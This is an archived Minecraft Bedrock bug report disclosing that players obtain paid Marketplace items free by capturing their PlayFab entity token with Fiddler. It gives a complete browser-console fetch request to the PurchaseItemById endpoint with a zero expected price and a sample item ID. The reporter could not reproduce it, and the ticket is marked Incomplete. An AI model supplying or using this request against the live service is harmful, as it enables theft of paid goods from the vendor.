Mojira Archive
MCPE-151119

Players can send POST requests to playfab API

I've been recently informed of players finding a way to get items for free through abuse of the playfab API. The way they are doing so is by collecting their x-entitytoken via Fiddler to decrypt their HTTPS domain traffic.

Once the user has their x-entitytoken they are able to send a POST request to the playfab API allowing them to 'purchase' items from the Marketplace, including hidden items such as the Mojang Studios staff cape.

After this they open up a random website on the internet, it could be any site. They go into the Chrome webkit console and send the following command: 

await fetch('https://20ca2.playfabapi.com/Catalog/PurchaseItemById', {
    method: 'POST',
    headers: {
        'content-type': 'application/json; charset=utf-8',
        'x-entitytoken': 'PASTE ENTITY_TOKEN HERE',
    },
    body: JSON.stringify({
        AutoConsume: false,
        Currencies: [
            {
                CurrencyId: 'ecd19d3c-7635-402c-a185-eb11cb6c6946',
                ExpectedPrice: '0',
            },
        ],
        ItemId: 'cfbb7987-e21a-43a3-8932-07294c2aefd7',
        Quantity: 1,
    }),
});

After replacing the entity token with your own, and adding the itemID (if you know it) you can gain the items for free.

I tried to recreate this bug and didn't have any success with incoming traffic not showing up through Fiddler and Minecraft completely stopping all requests being sent, although this seems to be the way most users are getting items they are not meant to have.

 

Incomplete

Hazard

2021-12-21, 04:18 PM

2023-01-20, 05:52 PM

2023-01-20, 05:52 PM

0

3

Plausible

746825

1.18.20.21 Beta, 1.18.2 Hotfix

-